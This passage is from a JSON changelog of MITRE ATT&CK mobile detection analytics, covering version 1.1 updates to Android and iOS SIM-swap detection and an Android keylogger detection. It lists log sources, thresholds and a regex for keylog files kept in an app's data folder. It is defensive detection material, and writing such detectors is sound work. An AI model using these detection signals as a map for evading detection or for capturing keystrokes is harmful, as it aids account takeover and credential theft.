                    "description": "A defender correlates a sudden carrier identity/service state change (SIM/line identifier change or unexpected loss of cellular service) with near-term device messaging/telephony disruption and a concurrent shift in authentication traffic patterns\u2014such as a spike in SMS-based verification flows or account recovery activity from the same user\u2019s identities\u2014indicating the user\u2019s number may have been transferred to a different SIM/device (SIM swap impact).",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6",
                            "name": "MobileEDR:telemetry",
                            "channel": "Cellular service state transitions (in-service\u2192no-service), SIM state change, carrier/operator identifier change, or baseband/telephony stack state change observed by agent telemetry"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "MobileEDR:telemetry",
                            "channel": "Agent-observable telephony subscription/state API signals indicating SIM/eSIM subscription change (vendor-agnostic: 'telephony subscription changed')"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
                            "name": "android:MDMLog",
                            "channel": "Device inventory changes involving phone number/line identifier fields (when available), eSIM profile presence, or compliance signal indicating SIM profile change"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
                            "name": "NSM:Flow",
                            "channel": "Near-term increase in traffic to identity endpoints associated with SMS MFA, account recovery, or OTP verification (IdP, banking, crypto), correlated to SIM/service loss"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
                            "name": "NSM:Flow",
                            "channel": "Abrupt shift from cellular egress to Wi-Fi-only egress, or new VPN/proxy session establishment following cellular service loss"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "ServiceLossDurationThreshold",
                            "description": "Minimum duration of unexpected cellular service loss before considering it suspicious (reduces noise from transient coverage issues)."
                        },
                        {
                            "field": "SimStateChangeTypes",
                            "description": "Which SIM-related state changes to alert on (SIM removed, SIM refresh, operator changed, eSIM profile changed)."
                        },
                        {
                            "field": "SwapCorrelationWindow",
                            "description": "Time window to correlate SIM/service state change with downstream identity traffic anomalies (e.g., 30m\u20136h)."
                        },
                        {
                            "field": "IdentityEndpointAllowList",
                            "description": "Baseline of expected IdP/banking/crypto identity endpoints for the org; used to reduce false positives."
                        },
                        {
                            "field": "AuthTrafficSpikeThreshold",
                            "description": "Threshold for increase in OTP/MFA/account recovery traffic volume relative to user baseline."
                        },
                        {
                            "field": "UserTravelContext",
                            "description": "Optional enrichment\u2014treat carrier changes as lower risk during known travel/roaming windows."
                        }
                    ],
                    "x_mitre_platforms": [
                        "Android"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"ServiceLossDurationThreshold\", \"description\": \"Minimum duration of unexpected cellular service loss before considering it suspicious (reduces noise from transient coverage issues).\"}, {\"field\": \"SimStateChangeTypes\", \"description\": \"Which SIM-related state changes to alert on (SIM removed, SIM refresh, operator changed, eSIM profile changed).\"}, {\"field\": \"SwapCorrelationWindow\", \"description\": \"Time window to correlate SIM/service state change with downstream identity traffic anomalies (e.g., 30m\\u20136h).\"}, {\"field\": \"IdentityEndpointAllowList\", \"description\": \"Baseline of expected IdP/banking/crypto identity endpoints for the org; used to reduce false positives.\"}, {\"field\": \"AuthTrafficSpikeThreshold\", \"description\": \"Threshold for increase in OTP/MFA/account recovery traffic volume relative to user baseline.\"}, {\"field\": \"UserTravelContext\", \"description\": \"Optional enrichment\\u2014treat carrier changes as lower risk during known travel/roaming windows.\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-03-06 15:07:15.622000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"A defender correlates a sudden carrier identity/service state change (SIM/line identifier change or unexpected loss of cellular service) with near-term device messaging/telephony disruption and a concurrent shift in authentication traffic patterns\\u2014such as a spike in SMS-based verification flows or account recovery activity from the same user\\u2019s identities\\u2014indicating the user\\u2019s number may have been transferred to a different SIM/device (SIM swap impact).\", \"old_value\": \"The OS may show a notification to the user that the SIM card has been transferred to another device.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Cellular service state transitions (in-service\\u2192no-service), SIM state change, carrier/operator identifier change, or baseband/telephony stack state change observed by agent telemetry\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--bf0ff551-a5a7-40e5-bff9-f9405011b1f4\", \"name\": \"User Interface\", \"channel\": \"None\"}}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][1]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Agent-observable telephony subscription/state API signals indicating SIM/eSIM subscription change (vendor-agnostic: 'telephony subscription changed')\"}, \"root['x_mitre_log_source_references'][2]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"android:MDMLog\", \"channel\": \"Device inventory changes involving phone number/line identifier fields (when available), eSIM profile presence, or compliance signal indicating SIM profile change\"}, \"root['x_mitre_log_source_references'][3]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c\", \"name\": \"NSM:Flow\", \"channel\": \"Near-term increase in traffic to identity endpoints associated with SMS MFA, account recovery, or OTP verification (IdP, banking, crypto), correlated to SIM/service loss\"}, \"root['x_mitre_log_source_references'][4]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c\", \"name\": \"NSM:Flow\", \"channel\": \"Abrupt shift from cellular egress to Wi-Fi-only egress, or new VPN/proxy session establishment following cellular service loss\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to159__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to159__0\"><a href=\"#difflib_chg_to159__top\">t</a></td><td class=\"diff_header\" id=\"from159_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">The&nbsp;OS&nbsp;may&nbsp;show&nbsp;a&nbsp;notification&nbsp;to&nbsp;the&nbsp;user&nbsp;that&nbsp;the&nbsp;SIM&nbsp;card</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to159__top\">t</a></td><td class=\"diff_header\" id=\"to159_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">A&nbsp;defender&nbsp;correlates&nbsp;a&nbsp;sudden&nbsp;carrier&nbsp;identity/service&nbsp;stat</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">&nbsp;has&nbsp;been&nbsp;transferred&nbsp;to&nbsp;another&nbsp;device.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">e&nbsp;change&nbsp;(SIM/line&nbsp;identifier&nbsp;change&nbsp;or&nbsp;unexpected&nbsp;loss&nbsp;of&nbsp;c</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ellular&nbsp;service)&nbsp;with&nbsp;near-term&nbsp;device&nbsp;messaging/telephony&nbsp;d</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">isruption&nbsp;and&nbsp;a&nbsp;concurrent&nbsp;shift&nbsp;in&nbsp;authentication&nbsp;traffic&nbsp;p</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">atterns\u2014such&nbsp;as&nbsp;a&nbsp;spike&nbsp;in&nbsp;SMS-based&nbsp;verification&nbsp;flows&nbsp;or&nbsp;a</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ccount&nbsp;recovery&nbsp;activity&nbsp;from&nbsp;the&nbsp;same&nbsp;user\u2019s&nbsp;identities\u2014ind</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">icating&nbsp;the&nbsp;user\u2019s&nbsp;number&nbsp;may&nbsp;have&nbsp;been&nbsp;transferred&nbsp;to&nbsp;a&nbsp;dif</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ferent&nbsp;SIM/device&nbsp;(SIM&nbsp;swap&nbsp;impact).</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--4ce71d01-ba3b-4ed2-a615-766daa0ff144",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-03-06 18:43:26.902000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0658#AN1748",
                            "external_id": "AN1748"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1748",
                    "description": "A defender correlates an unexpected change in cellular subscription state (eSIM/SIM profile change, carrier/operator change, or sudden persistent loss of cellular service) with near-term disruption signals and a rapid increase in authentication-related network activity consistent with SMS verification or account recovery flows, suggesting the user\u2019s number has been ported to an adversary-controlled SIM/device (SIM swap impact).",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6",
                            "name": "MobileEDR:telemetry",
                            "channel": "Cellular service state transitions (in-service\u2192no-service), SIM state change, carrier/operator identifier change, or baseband/telephony stack state change observed by agent telemetry"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
                            "name": "iOS:MDMLog",
                            "channel": "Managed device inventory change indicating cellular plan/eSIM profile updates (where available via supervised iOS + MDM reporting)"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "MobileEDR:telemetry",
                            "channel": "Agent-observable telephony subscription/state API signals indicating SIM/eSIM subscription change (vendor-agnostic: 'telephony subscription changed')"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
                            "name": "NSM:Flow",
                            "channel": "Near-term increase in traffic to identity endpoints associated with SMS MFA, account recovery, or OTP verification (IdP, banking, crypto), correlated to SIM/service loss"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
                            "name": "NSM:Flow",
                            "channel": "Abrupt shift from cellular egress to Wi-Fi-only egress, or new VPN/proxy session establishment following cellular service loss"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "SupervisedInventoryAvailability",
                            "description": "Tuning based on whether supervised iOS + MDM provides sufficient subscription/eSIM visibility; otherwise rely on agent + network signals."
                        },
                        {
                            "field": "ServiceLossDurationThreshold",
                            "description": "Minimum persistent no-service duration required to reduce false positives from normal carrier fluctuations."
                        },
                        {
                            "field": "SwapCorrelationWindow",
                            "description": "Time window to link subscription disruption with identity/auth network anomalies."
                        },
                        {
                            "field": "AuthTrafficSpikeThreshold",
                            "description": "Threshold for suspicious increase in OTP/MFA/account recovery traffic relative to device/user baseline."
                        },
                        {
                            "field": "RoamingExpectedRegions",
                            "description": "Tuning to reduce false positives when the user is traveling or roaming across carrier networks."
                        },
                        {
                            "field": "IdentityEndpointAllowList",
                            "description": "Baseline list of expected identity endpoints (IdP, banking, crypto) for the device/user population"
                        }
                    ],
                    "x_mitre_platforms": [
                        "iOS"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"SupervisedInventoryAvailability\", \"description\": \"Tuning based on whether supervised iOS + MDM provides sufficient subscription/eSIM visibility; otherwise rely on agent + network signals.\"}, {\"field\": \"ServiceLossDurationThreshold\", \"description\": \"Minimum persistent no-service duration required to reduce false positives from normal carrier fluctuations.\"}, {\"field\": \"SwapCorrelationWindow\", \"description\": \"Time window to link subscription disruption with identity/auth network anomalies.\"}, {\"field\": \"AuthTrafficSpikeThreshold\", \"description\": \"Threshold for suspicious increase in OTP/MFA/account recovery traffic relative to device/user baseline.\"}, {\"field\": \"RoamingExpectedRegions\", \"description\": \"Tuning to reduce false positives when the user is traveling or roaming across carrier networks.\"}, {\"field\": \"IdentityEndpointAllowList\", \"description\": \"Baseline list of expected identity endpoints (IdP, banking, crypto) for the device/user population\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-03-06 18:43:26.902000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"A defender correlates an unexpected change in cellular subscription state (eSIM/SIM profile change, carrier/operator change, or sudden persistent loss of cellular service) with near-term disruption signals and a rapid increase in authentication-related network activity consistent with SMS verification or account recovery flows, suggesting the user\\u2019s number has been ported to an adversary-controlled SIM/device (SIM swap impact).\", \"old_value\": \"The OS may show a notification to the user that the SIM card has been transferred to another device.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Cellular service state transitions (in-service\\u2192no-service), SIM state change, carrier/operator identifier change, or baseband/telephony stack state change observed by agent telemetry\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--bf0ff551-a5a7-40e5-bff9-f9405011b1f4\", \"name\": \"User Interface\", \"channel\": \"None\"}}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][1]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"iOS:MDMLog\", \"channel\": \"Managed device inventory change indicating cellular plan/eSIM profile updates (where available via supervised iOS + MDM reporting)\"}, \"root['x_mitre_log_source_references'][2]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Agent-observable telephony subscription/state API signals indicating SIM/eSIM subscription change (vendor-agnostic: 'telephony subscription changed')\"}, \"root['x_mitre_log_source_references'][3]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c\", \"name\": \"NSM:Flow\", \"channel\": \"Near-term increase in traffic to identity endpoints associated with SMS MFA, account recovery, or OTP verification (IdP, banking, crypto), correlated to SIM/service loss\"}, \"root['x_mitre_log_source_references'][4]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c\", \"name\": \"NSM:Flow\", \"channel\": \"Abrupt shift from cellular egress to Wi-Fi-only egress, or new VPN/proxy session establishment following cellular service loss\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to112__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to112__0\"><a href=\"#difflib_chg_to112__top\">t</a></td><td class=\"diff_header\" id=\"from112_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">The&nbsp;OS&nbsp;may&nbsp;show&nbsp;a&nbsp;notification&nbsp;to&nbsp;the&nbsp;user&nbsp;that&nbsp;the&nbsp;SIM&nbsp;card</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to112__top\">t</a></td><td class=\"diff_header\" id=\"to112_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">A&nbsp;defender&nbsp;correlates&nbsp;an&nbsp;unexpected&nbsp;change&nbsp;in&nbsp;cellular&nbsp;subsc</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">&nbsp;has&nbsp;been&nbsp;transferred&nbsp;to&nbsp;another&nbsp;device.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ription&nbsp;state&nbsp;(eSIM/SIM&nbsp;profile&nbsp;change,&nbsp;carrier/operator&nbsp;cha</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">nge,&nbsp;or&nbsp;sudden&nbsp;persistent&nbsp;loss&nbsp;of&nbsp;cellular&nbsp;service)&nbsp;with&nbsp;nea</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">r-term&nbsp;disruption&nbsp;signals&nbsp;and&nbsp;a&nbsp;rapid&nbsp;increase&nbsp;in&nbsp;authentica</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">tion-related&nbsp;network&nbsp;activity&nbsp;consistent&nbsp;with&nbsp;SMS&nbsp;verificati</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">on&nbsp;or&nbsp;account&nbsp;recovery&nbsp;flows,&nbsp;suggesting&nbsp;the&nbsp;user\u2019s&nbsp;number&nbsp;h</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">as&nbsp;been&nbsp;ported&nbsp;to&nbsp;an&nbsp;adversary-controlled&nbsp;SIM/device&nbsp;(SIM&nbsp;sw</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ap&nbsp;impact).</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--8c29fa0f-6b35-40c2-9c99-081a0997db86",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-01-29 18:53:00.289000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0661#AN1751",
                            "external_id": "AN1751"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1751",
                    "description": "Defender correlates an app acquiring input-capture capability (AccessibilityService enablement or default IME set) with high-frequency text-change/IME commit callbacks sourced from other packages, followed by local keylog persistence and/or small, immediate network egress. Chain: capability/permission \u2192 intercept (accessibility \u2018TYPE_VIEW_TEXT_CHANGED\u2019 or IME commitText/onStartInput bursts) \u2192 persist to container \u2192 near-term egress.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--1887a270-576a-4049-84de-ef746b2572d6",
                            "name": "android:logcat",
                            "channel": "Grant/enablement for BIND_ACCESSIBILITY_SERVICE or BIND_INPUT_METHOD for <pkg>"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "android:logcat",
                            "channel": "AccessibilityService connected|TYPE_VIEW_TEXT_CHANGED|TYPE_VIEW_FOCUSED events for other packages"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa",
                            "name": "android:logcat",
                            "channel": "Default IME active imeId=<pkg>; frequent onStartInput/commitText calls"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c",
                            "name": "android:logcat",
                            "channel": "CREATE/WRITE to /data/data/<pkg>/(files|databases)/(keys|inputs|clipboard).*\\\\.(db|sqlite|txt|log)"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindowSeconds",
                            "description": "Max time between intercept \u2192 persist/exfil (e.g., 5\u201345s)."
                        },
                        {
                            "field": "MinKeyEventBurst",
                            "description": "Minimum input events in window to flag (e.g., \u226510)."
                        },
                        {
                            "field": "RequireA11yOrIME",
                            "description": "Only alert when capability is via Accessibility or IME (true/false)."
                        },
                        {
                            "field": "PersistPathRegex",
                            "description": "Regex for keylog artifacts in app container."
                        },
                        {
                            "field": "ExfilDomainAllowlist",
                            "description": "Enterprise/analytics endpoints to suppress FPs."
                        },
                        {
                            "field": "UserContext",
                            "description": "Foreground/Work Profile/Kiosk to scope alerts."
                        }
                    ],
                    "x_mitre_platforms": [
                        "Android"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindowSeconds\", \"description\": \"Max time between intercept \\u2192 persist/exfil (e.g., 5\\u201345s).\"}, {\"field\": \"MinKeyEventBurst\", \"description\": \"Minimum input events in window to flag (e.g., \\u226510).\"}, {\"field\": \"RequireA11yOrIME\", \"description\": \"Only alert when capability is via Accessibility or IME (true/false).\"}, {\"field\": \"PersistPathRegex\", \"description\": \"Regex for keylog artifacts in app container.\"}, {\"field\": \"ExfilDomainAllowlist\", \"description\": \"Enterprise/analytics endpoints to suppress FPs.\"}, {\"field\": \"UserContext\", \"description\": \"Foreground/Work Profile/Kiosk to scope alerts.\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-01-29 18:53:00.289000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"Defender correlates an app acquiring input-capture capability (AccessibilityService enablement or default IME set) with high-frequency text-change/IME commit callbacks sourced from other packages, followed by local keylog persistence and/or small, immediate network egress. Chain: capability/permission \\u2192 intercept (accessibility \\u2018TYPE_VIEW_TEXT_CHANGED\\u2019 or IME commitText/onStartInput bursts) \\u2192 persist to container \\u2192 near-term egress.\", \"old_value\": \"Application vetting services can look for applications requesting the `android.permission.BIND_ACCESSIBILITY_SERVICE` permission in a service declaration. On Android, the user can view and manage which applications can use accessibility services through the device settings in Accessibility. The exact device settings menu locations may vary between operating system versions.\\nOn Android, the user can view and manage which applications have third-party keyboard access through the device settings in System -> Languages & input -> Virtual keyboard. On iOS, the user can view and manage which applications have third-party keyboard access through the device settings in General -> Keyboard. \", \"diff\": \"--- \\n+++ \\n@@ -1,2 +1 @@\\n-Application vetting services can look for applications requesting the `android.permission.BIND_ACCESSIBILITY_SERVICE` permission in a service declaration. On Android, the user can view and manage which applications can use accessibility services through the device settings in Accessibility. The exact device settings menu locations may vary between operating system versions.\\n-On Android, the user can view and manage which applications have third-party keyboard access through the device settings in System -> Languages & input -> Virtual keyboard. On iOS, the user can view and manage which applications have third-party keyboard access through the device settings in General -> Keyboard. \\n+Defender correlates an app acquiring input-capture capability (AccessibilityService enablement or default IME set) with high-frequency text-change/IME commit callbacks sourced from other packages, followed by local keylog persistence and/or small, immediate network egress. Chain: capability/permission \\u2192 intercept (accessibility \\u2018TYPE_VIEW_TEXT_CHANGED\\u2019 or IME commitText/onStartInput bursts) \\u2192 persist to container \\u2192 near-term egress.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--1887a270-576a-4049-84de-ef746b2572d6\", \"name\": \"android:logcat\", \"channel\": \"Grant/enablement for BIND_ACCESSIBILITY_SERVICE or BIND_INPUT_METHOD for <pkg>\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"Application Vetting\", \"channel\": \"None\"}}, \"root['x_mitre_log_source_references'][1]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"android:logcat\", \"channel\": \"AccessibilityService connected|TYPE_VIEW_TEXT_CHANGED|TYPE_VIEW_FOCUSED events for other packages\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6\", \"name\": \"User Interface\", \"channel\": \"None\"}}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][2]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa\", \"name\": \"android:logcat\", \"channel\": \"Default IME active imeId=<pkg>; frequent onStartInput/commitText calls\"}, \"root['x_mitre_log_source_references'][3]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c\", \"name\": \"android:logcat\", \"channel\": \"CREATE/WRITE to /data/data/<pkg>/(files|databases)/(keys|inputs|clipboard).*\\\\\\\\.(db|sqlite|txt|log)\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
